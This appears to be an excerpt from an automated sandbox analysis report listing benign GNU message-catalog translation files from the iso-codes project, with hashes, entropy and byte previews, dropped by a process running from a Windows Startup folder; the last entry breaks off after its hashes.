                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\260\254\340\261\215\340\260\260\340\260\277\340\260\237\340\260\277\340\260\267\340\261\215 \340\260\205\340\260\202\340\260\237\340\260\276\340\260\260\340\261\215\340\260\225\340\260\277\340\260\237\340\260\277\340\260\225\340\261\215 \340\260\252\340\261\215\340\260\260\340\260\246\340\261\207\340\260\266\340\260\256\340\261\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4169
                                                                                                    Entropy (8bit):5.1084799966570005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDXWfsyBoHS9+Xg7FxF58FZu2hSSFzFZTFrJ9hLuFZpbPuFpJP3rHFsZ32Y:qDXWcHoBD2RpnrHh2XbClsN
                                                                                                    MD5:2F4D0556E7A5E5DAB1205798CFC6C86C
                                                                                                    SHA1:E2D256F98240D57FF3824F110CD0D5B5C4CEADD0
                                                                                                    SHA-256:D49DE98F23E170E131D2BE5A8BFC063FE098B6631B7B2DE3DDFFFAE1504E707B
                                                                                                    SHA-512:B40D710EE40D15C7F5CCC2B192951520E5008CA9BADEEB9CF6BCC0E8C9CDF4460A0AFD8775AE27A571EFF8534D77B1E32B1BCC741545F69AD0287F14D0C79058
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................V...T...v..........."...T.......................8.......".......A.......K...4...........P.......T...Q...7...............@.......(...N...+...w..._......./.......J...3.......~...(.......c...........$...I.......}...............t.......3............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\322\223\320\276\320\275\320\270\321\201\321\202\320\276\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28527
                                                                                                    Entropy (8bit):5.30668046995776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:jhZDjjl68ItmsWP4XdAIcq6fGHstCKIIw5iP+lce:LDV6fKn3EKHfmce
                                                                                                    MD5:B9D402087B8E910F8A07D37181F5FAFF
                                                                                                    SHA1:82A8C7E969175EE769406D08238A95AF89AF3409
                                                                                                    SHA-256:4351AC6DD123D4FCABCAC6EADB2CC12D574C7610ABF46D98589D99D0D2906FF5
                                                                                                    SHA-512:E3D95227A0C1548C6F41950430F0329B2FF04E043E0D363FFA17EDDE35E0119877B802998E5ADFC9DA4B9B97615668E3EFC9C321832054EE6448568D17D3CF6B
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 156 messages, Project-Id-Version: iso_15924 '\340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\255\340\270\231\340\270\262\340\271\202\340\270\225\340\271\200\340\270\245\340\270\265\340\270\242 (\340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\245\340\270\271\340\271\200\340\270\247\340\270\265\340\270\242, \340\271\204\340\270\256\340\271\202\340\270\243\340\270\201\340\270\245\340\270\264\340\270\237\340\270\256\340\270\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11584
                                                                                                    Entropy (8bit):5.068556255176557
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WzSfHl+Veox944Lj4SaorSC1Phf5yH3vb6AdXsjKq8e/siQ9oUDS8QV8QUpdijbt:58944LjzaorSC1P/yH3vuA1sjhQ9oUDu
                                                                                                    MD5:1DDE1660DCC965E012B672043B3D60BB
                                                                                                    SHA1:4E0AC1B1E53216BC364F431A92BC9B2D987E570A
                                                                                                    SHA-256:2265FAFC30FAE6200403E03C74E46BEB0AEAA1BE90C4F6390126F275B1EA547B
                                                                                                    SHA-512:F49F27E953F208AB116EFABCCA5965E563FE0A95336F49D26682FE02840D28A6202FF709DD175E553B65FD97BE9381214BCA96812C562719AAB3E3DE7889ABD3
                                                                                                    Malicious:false
                                                                                                    Preview:................................(...?...).......i.......p.......y...............................................................................................................................................................7.......O.......l...................................&.......................(...........1.......B.......T.......i.......q.............................................................................................../.......6.......=.......F.......W.......h.......~...........4...................................................#...............4.......;.......M.......m.......q.......w.............................................................................................................../.......A.......`.......n...........................................................................................#...........%..."...E...)...h.......................................................................................................).......C... ...b...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 413 messages, Project-Id-Version: iso_3166-1 '\340\270\255\340\270\261\340\270\237\340\270\201\340\270\262\340\270\231\340\270\264\340\270\252\340\270\226\340\270\262\340\270\231'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33663
                                                                                                    Entropy (8bit):4.985121752626473
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:pZd6DkBkLVfovmsOP4XLAIAcBBH7EJypA3s/NmdreTUJL00g4aVGibftzay9ZBmo:1zuKtLGyT/symDO3
                                                                                                    MD5:6F00A2E09B0916A4AC70E9F0465A723D
                                                                                                    SHA1:3C6D4C30C3FFDCA5776D7C0EF38149143D4B2DE7
                                                                                                    SHA-256:E9384B31E9B904D2D8674BBA4B956A681E488656AF599A83613B7584193480D2
                                                                                                    SHA-512:B6957EB41F7C94AD4F4663AE9A5E770B4C38378A58C09A85061C5E3CD93B416E508FC792330736628DC021C1806B364F2EB0614A7515F377A6D75584F86314AF
                                                                                                    Malicious:false
                                                                                                    Preview:....................-............".......".......".......".......".......".......".......".......".......".......#.......#......$#......7#......?#......E#......O#......W#......b#......j#......r#......}#.......#.......#.......#.......#.......#.......#.. ....#.......#.......#.. ....#.......$......3$......<$......J$......Q$......p$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%.......%.......%......%%......=%......F%......_%..,...{%.......%.......%..%....%.......%.......%.......%.......%.......&.......&.......&...... &......(&..%...7&..,...]&.."....&..*....&.......&.......&.......&.......&.......'......!'......)'....../'......;'......M'......U'......]'......f'.......'..'....'..$....'.......'.......'.......(......1(......P(......n(......s(......{(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)......&)......-)......7)......?)......J)......O)......Y)......b)......i)......w)......~).......)..!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1399 messages, Project-Id-Version: iso_3166-2 '\340\270\255\340\270\262\340\270\243\340\271\214\340\271\200\340\270\201\340\270\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):82740
                                                                                                    Entropy (8bit):5.0072497653643335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:IyAjHidmjJr6d3TVY6uyJJtFNUh6yy13woWMlvpa0pvwOLGEHyLy4nRId:RSHj6tVY6uZy1QuAEyLy4nk
                                                                                                    MD5:199A7134162E8C04C5082F5FD5B723D4
                                                                                                    SHA1:395BA8527BAE234B622280EDEF8AF1E38E3D7970
                                                                                                    SHA-256:D7C2DF98DF76C5F17398FAEE3D708C875A9453F8241A9CD7729CA7E13B6AB971
                                                                                                    SHA-512:47F0ACFB322D44DADACD610AEA789A74E8F1896253B9C6BEFB8080115D73BF9A21A0255C486E1E323B9230549B4E9F58B6853FC04159DB3E8F4EA17658122894
                                                                                                    Malicious:false
                                                                                                    Preview:........w........+..K....W.......t.......t.......t.......t.......t.......t.......t.......t.......t.......t.......t.......u.......u.......u......+u......1u......7u......Au......Vu......bu......ju......tu.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......u.......v.......v.......v......'v....../v......6v......Rv......av......iv......zv.......v.......v.......v.......v.......v.......v.......v.......v.......v.......v.......v.......w.......w.......w.......w......"w......+w......2w......:w......Cw......Kw......Sw......Xw......^w......ew......sw......yw.......w.......w.......w.......w.......w.......w.......w.......w..+....w.......x.......x.......x.......x......#x.......x......5x......>x......Ex......Mx......`x......hx......qx......yx......~x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......x.......y.......y.......y.......y......#y....../y......Iy......Ry......oy......vy......}y.......y.......y......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\270\232\340\270\243\340\270\264\340\270\225\340\270\264\340\270\212\340\271\201\340\270\255\340\270\231\340\270\225\340\270\262\340\270\243\340\271\214\340\270\201\340\270\225\340\270\264\340\270\201\340\271\200\340\270\227\340\270\243\340\271\214\340\270\243\340\270\264\340\270\227\340\270\255\340\270\243\340\270\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3819
                                                                                                    Entropy (8bit):5.188867539575419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDt2+3yBoaNUvTBLyyZkyvV01JgjvTOhWfT3BGG0xG:qDs+NuUvdVkyvu1JIvyhWfTBGGuG
                                                                                                    MD5:7BFF4ADDA9F05AAE2815309BA4F386B2
                                                                                                    SHA1:7A99DBC28FB7A5EB9B1FEB6F6784DFD0C2206E93
                                                                                                    SHA-256:2295542D22091F86BDAC4AC760C77A3E15EF7D1669D7F39440764D9437538910
                                                                                                    SHA-512:9A6145672C2C10D21618ED766E914EED719182653E577A88FA10C72853B0154F2E825EA8A6B2D7FECF07D16ED5FC3EBF54FFAEDEC1B914251811BC6B442BBAB9
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........o.......Q......._...k...n.......Z...:..._...............-.......*...<...H...g...H.......{.......S...u...N.......'.......-...@...?...n...!.......!.......`.......'...S...B...{...........!.......K.......f...?...D.......V...........B...b...X.../............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 '\340\270\255\340\270\261\340\270\237\340\270\201\340\270\262\340\270\231\340\270\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10193
                                                                                                    Entropy (8bit):4.907466602737853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehPn35MTPCVOkKjJJaPnwFbJFf5f+QTcf7zyWaib+vUEA+YGtvV7g7dsRMn:Hn4W35MTPGlKVEKzxfT67zyWaibCE8tm
                                                                                                    MD5:96FAF1103B5D88EE13E671C21DC7FDA5
                                                                                                    SHA1:A7FDA9269463F783F2491B342468167CB9FA0767
                                                                                                    SHA-256:83AB80D75935B2141D8EC917FCFF93A3F9BAFE68DAE0AA5E4B7DFF226A54EA1F
                                                                                                    SHA-512:295A7CAD204B798CED827A5C7BCDD7459178ACD094B75131ABEF09B45277A668CEC7949EC546E4A8E0F222166FA663F8DEBA9A44FB2365328E62A3EC9C1F097F
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 711 messages, Project-Id-Version: iso_639-3 '\340\271\201\340\270\255\340\270\232\340\270\201\340\270\262\340\271\200\340\270\213\340\270\265\340\270\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):53438
                                                                                                    Entropy (8bit):5.075896409348321
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:WDbQw4l8lWctkTiEvsFXtxprL+kWdjs0gyNpk6QrHx7:OW+lWReEmkk5p6Q7B
                                                                                                    MD5:D479C37DF2A7E33C3BF196F1D7ADFE4A
                                                                                                    SHA1:DF5FFEB173689EE75D1C733160EB63F25F22B6AE
                                                                                                    SHA-256:6510831288947A04DC10B76B28968688BC098F668C861110885A8EB3A5F8286C
                                                                                                    SHA-512:6ED578A57256772FBEDB37DED145CB47FD25889325D82D3D73C4AF1B9B6D9F8A022EE6776C243C91C89A587D75DA1521B080F697B6013F5AE87CB81C6B13E16C
                                                                                                    Malicious:false
                                                                                                    Preview:................T........,......p;......q;......{;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<......&<......=<......E<......]<......l<.......<.."....<.......<.......<.......<.......<.......<.......=.......=......+=......@=......O=......d=......u=.......=.......=.......=.......=.......=.......=.......=.......>......$>......<>......E>......\>......p>.......>.......>..#....>.......>.......>.......>.......>.......>.......?.......?.......?......2?......I?......R?......a?......i?......p?......{?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......@.......@......"@......)@......2@......8@......B@......Z@......b@......o@.......@.......@.......@.......@.......@.......@.......@.......@.......@.......A.......A......(A......7A......MA......TA......bA......pA......xA.......A.......A.......A.......A.......A.......A.......A.......B.......B......&B......8B......IB......ZB......mB......zB.......B.......B.......B.......B......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 209 messages, Project-Id-Version: iso_3166-1 '\341\212\243\341\215\215\341\214\213\341\212\222\341\210\265\341\211\263\341\212\225'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11811
                                                                                                    Entropy (8bit):5.171500265044734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:BvF8RsnMQWZUaqW4Ro1V299UF6J6/74OeYh1+HuYbOrrMbvyfasl:BvF8RPpFs9UF6s/74rYf+HuYbOrr4yfp
                                                                                                    MD5:9D86D76CC9C9CB5397616ACAD9D3AEC1
                                                                                                    SHA1:8161F5DFF92CC502ED512887BFBBFCFC5D9BCEA6
                                                                                                    SHA-256:8CBCAA925C046923C1A07127DEA33832E430A63B777B6946B841364513898067
                                                                                                    SHA-512:E2C2D9B26D27AB5B98A91DC8F3A349AED24F68628F48DD396B78BF58F54E553C31F103561C85BA8C090685A22320514DC72854DB1956D7B7647B0612D5BC0000
                                                                                                    Malicious:false
                                                                                                    Preview:........................,....................................................................................................................................... .......(.......3.......<.......D.......L.......S.......Y.......a... ...h...............................................................................................................$.......*.......0.......9.......A...%...G.......m.......x....................................................................................................................... ...'...).......Q.......m.......................................................................................................................%.......,.......2.......;.......E.......M.......U.......[.......e.......j.......r......................................................................................................./.......6.......=.......E.......K.......U.......`.......g.......p.......u.......{.......................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):477
                                                                                                    Entropy (8bit):5.362255503008239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iGlD1xjt02UkLKcG/Ki4FLZLXmBQWihjEl:h5t0UPKKzFlLXm6M
                                                                                                    MD5:8016B7DB3E1AF9C18D5DEF26DBB765D0
                                                                                                    SHA1:3CA2885942E47308D91A70AEBB4EDC897B7D0201
                                                                                                    SHA-256:5B399D6BEE7CF72B8506EC7013D37186290FDEC8E067419F37401633F4BA6471
                                                                                                    SHA-512:3D0FF847336C7A8A32C55692F7746851A7A425B760B4FE14FAE7E0468D67A3E917FB35EE72ACF49324A1EEFCEA3132D06C46F06A9430EC01018D43976CB72C06
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...P...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Tigrinya.Language: ti.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 122 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5858
                                                                                                    Entropy (8bit):4.929516002686295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:o45T1/kqoi01+uYQPB5RlbP/m5KbpH95MNLA+Fsk2pL5lsx2Or8ZFdjVoEP0GCuk:hBL2nYu5RlD/uK99qVilIkOr8ZrjnMuk
                                                                                                    MD5:EBDC3D911D70CF1C8A0E9FABB21DFAD6
                                                                                                    SHA1:61483AAF72B013BE3D29A27CA332AF5F2E83DA68
                                                                                                    SHA-256:AEE753D35EB578C0ACEE90C1742BEC0F3542929ED4BBEDE83AE473544D164D7D
                                                                                                    SHA-512:AFE008158500EBB31A23BE6B9E2D3C03A1507FB0ADF68C6967DB74AA4CDBFF18D543B13ACAF78BDE88F787EE45A32258126FE907C2D551D8C7C89A6F1E9F33A2
                                                                                                    Malicious:false
                                                                                                    Preview:........z.......................H.......I.......S.......X.......b.......k.......s.......z............................................................................................................................................................... .......(.......2.......;.......C.......J.......R.......Y.......^.......g.......n.......v...............................................................................................................................................................".......*...............4.......<.......D.......O.......Z.......c.......m.......r.......z...............................................................................................................................................................................$.......+.......;.......E.......K.......S.......[.......a.......g.......m.......t.......y.......................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5712
                                                                                                    Entropy (8bit):5.024910911659017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5sIkEGl1TiO89kjFbEylUyAbPcBwG7YG/wLYpoikXLyCviLz:i1Vy1s0FbEKtNZfoLz4
                                                                                                    MD5:48C158245EAFBA129508F68F174505AB
                                                                                                    SHA1:C9B4B36300C4D9D8C6A6BEEA18B7D36549AD0E2F
                                                                                                    SHA-256:56A10B36C58F0BC77419F9D1FA2DFDBA15AD4252760E19220E18630EF1EBC750
                                                                                                    SHA-512:7AD4893922E4ADA30FDD2E68F8F9FCDA5DFBB1870C78BFE6F192BD4A01F8389F1E673957CCCC06AFB6C91A34F4B8D4BD427713CFE757239592971603066CCC98
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................N...................&.......6.......C.......V.......f.......|.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):475
                                                                                                    Entropy (8bit):5.35763053537991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:il/Q1xjt02UkLKcG/Ki4FLZXZsXmBQWihjEl:UA5t0UPKKzFlXSXm6M
                                                                                                    MD5:798FA10E58A738EA4EC9F3A52ED2A7E1
                                                                                                    SHA1:AE123D010B9CF7D5BCECAB71B1BDAC2CECEDAABD
                                                                                                    SHA-256:9CD9FF0EE1EBE94015659D6F81B76189514021CFAA6DE133194D3EFCB6F248AA
                                                                                                    SHA-512:1C20C32BA22D74498F44F8394B718C56A1185F5A2590B3B4E1DBA90FEF8F47539132FA239F87E4880A9440F6A61F21687AA86F714B2316E9535B038F696B3967
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...N...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Tigre.Language: tig.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5697
                                                                                                    Entropy (8bit):4.867683621277235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHydrG+Kbpy95MobX/2pL5lsx2OrtZFdjVoEP0GCuk:k0u8pG+KU9qnlIkOrtZrjnMuk
                                                                                                    MD5:E29FBEB10E3102FEBCFDA99E23AADEC2
                                                                                                    SHA1:98491400CB70C46D57549BB01592B489A0394AD3
                                                                                                    SHA-256:5896030623F0648FCC4C527001CB9D43089999C9CF205BAB1E09349FF53CC546
                                                                                                    SHA-512:EE24CEE62A2695B83A5166F3BAF93369460A2C7BBCA7F82F2DE3D30A713A5D4CAD44D28806B19C6B26836925743EA3AA3300AECC006274C12D6A367425AC2D57
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................J...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 336 messages, Project-Id-Version: iso_3166-1 'Owganystan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18029
                                                                                                    Entropy (8bit):5.052227374226757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ubgwz/I1qIx7VolwcPieRNNTDwhL8XP4dovAs2Y0IXIyKDNW:YCB67bcL8XP4dovAsDIyKDNW
                                                                                                    MD5:B51DDF4D36134C75727D521BCC57A561
                                                                                                    SHA1:AFA28860843D0E559153C348A51C756B26B9B81D
                                                                                                    SHA-256:3E534E9E733A134734A1BB563A9FD71E764F656B08CB9BF0F7180B97663736F8
                                                                                                    SHA-512:FACCF1220601F23A8A8407A0F4E7FD54AF171C0AB29CC06D295D6E3B8016EA99995E8AEAAF29755755058EDB8141D3C59FDCA0DC33333F76FC2DAA04402DB666
                                                                                                    Malicious:false
                                                                                                    Preview:........P....................... .......!.......-.......5.......=.......L.......T.......[.......o.......y...............................................................................................................................................&......./.......6.......M......._.......h.......u.......}...................................................................................%...........,.......7.......?.......D.......K.......Z...%...i...,.......*...........................................................(.......:.......B.......J.......S.......o...'...}........................................ ....... ......' ....... ......< ......L ......R ......d ......k ......s ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!......4!......=!......G!......O!......W!......r!......x!.......!.......!.......!.......!.......!.......!.......!......."......."......."......$"......*"......1"......<"......B"......U"......g"......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):416
                                                                                                    Entropy (8bit):5.267729352853025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilij+EYYxA9Ct0vOuvP0NXzffUvsaRD/RxFrXuAFRLXJhs9XmBQ8KMW0YEi9:i4Bxxjt02UkosaZ/bhjRLk9XmBQWi9
                                                                                                    MD5:EDC903C7981C28987392A709F249A3B6
                                                                                                    SHA1:183CD54BCD25668041B8DE831792632DDCA9C8D8
                                                                                                    SHA-256:38D5E8097FF2FDCC0E4329105401931E0B2CE4BA77828A4D00683BD7CD92022B
                                                                                                    SHA-512:6C792A3C11EA19CFBCB72BAFF4858B445096CE7BDA14FAA28197B6165874F1EABFFAC41B4BEDB3CCBA6EEB2A2800EEF8A367FE33376CE9B8C0B1DA7B9F994B0D
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...f...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-20 20:10I+0330.Last-Translator: Kakilik Group <kakilikgroup@yahoo.com>.Language-Team: Turkmen <kakilikgroup@yahoo.com>.Language: tk.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 386 messages, Project-Id-Version: iso_3166-1 'Apganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21411
                                                                                                    Entropy (8bit):4.976352465498494
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:rKLh4jnufhB3HqDe2gJzbj0bsfP4X2CA0cu3azYyO0dvKHAjyLF:rK9GnufhhKcJ/QbsfP4X2CA0WvO0dvKd
                                                                                                    MD5:2A57028CB3A9112A681B0981AD449A3C
                                                                                                    SHA1:F0B0517D46FCB82656A72B4BEA8C42F0BB5AFCBC
                                                                                                    SHA-256:27518A19E30336F90982388C8DB48D314C0DC29F2B18C8835AC1C67171816705
                                                                                                    SHA-512:4E5BE0959B63A7139FB69635391ED96F08063E02D180EC8FEC19A9A2D102BDEFF833AD574FAD05B81F2D35989D545D65005C1A748EF2385AD6FC839979D79E6D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......` ......a ......m ......u ......} ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......"!......*!......2!......=!......F!......N!......V!......]!......c!......k!.. ...r!.......!.......!.......!.......!.......!.......!.......!......."......."......!"......."......6"......?"......H"......O"......^"......w"......|"......."......."......."......."......."......."..,....".......#......$#..%...*#......P#......]#......h#......p#......u#......|#.......#..%....#..,....#.."....#..*....$......;$......C$......L$......U$......h$.......$.......$.......$.......$.......$.......$.......$.......$.......$..'....$.......%......7%......S%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......$&.......&......H&......O&......Y&......a&......l&......q&......{&.......&.......&.......&.......&.......&..!....&.......&.......&.......'.......'..0...''......X'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):477
                                                                                                    Entropy (8bit):5.1951573524627275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:itlfz1xjt02Uk+/2BeqgBBQoZqkvvXmBQWitp:ez5t0Ui2OBQKXmm
                                                                                                    MD5:3D2EA1A2F7E1E8BEE44411687856BDCA
                                                                                                    SHA1:D5AF0563A8D03117E17965033AF63F5E96F7FEBD
                                                                                                    SHA-256:236834A214C084F9BFF5484049848D5FC5F0E20DE210F954BE2F87A3D9773493
